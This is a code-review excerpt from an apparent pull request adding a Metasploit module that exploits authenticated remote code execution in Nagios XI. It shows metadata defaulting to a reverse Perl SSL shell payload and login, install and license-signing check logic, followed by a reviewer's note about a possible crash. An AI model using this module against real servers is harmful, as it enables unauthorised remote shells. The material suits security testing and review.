modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb

```diff
@@ -0,0 +1,172 @@
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [REPEATABLE_SESSION]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
+  def check
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result
+        return CheckCode::Unknown(install_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3 # An error occurred
+        return CheckCode::Unknown(res_array[0])
+      when 4 # Nagios XI is still not fully installed
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
+    end
+
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI')
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
```

Comment:
As noted in other PRs, this code will stack trace if `login_result` was `4` after calling `login_after_install_or_license`, as in these cases `res_array` will be an array with only one element inside of it. Leaving this for now as its less likely that this case will be encountered given all the other checks that are going on but still something to be aware of.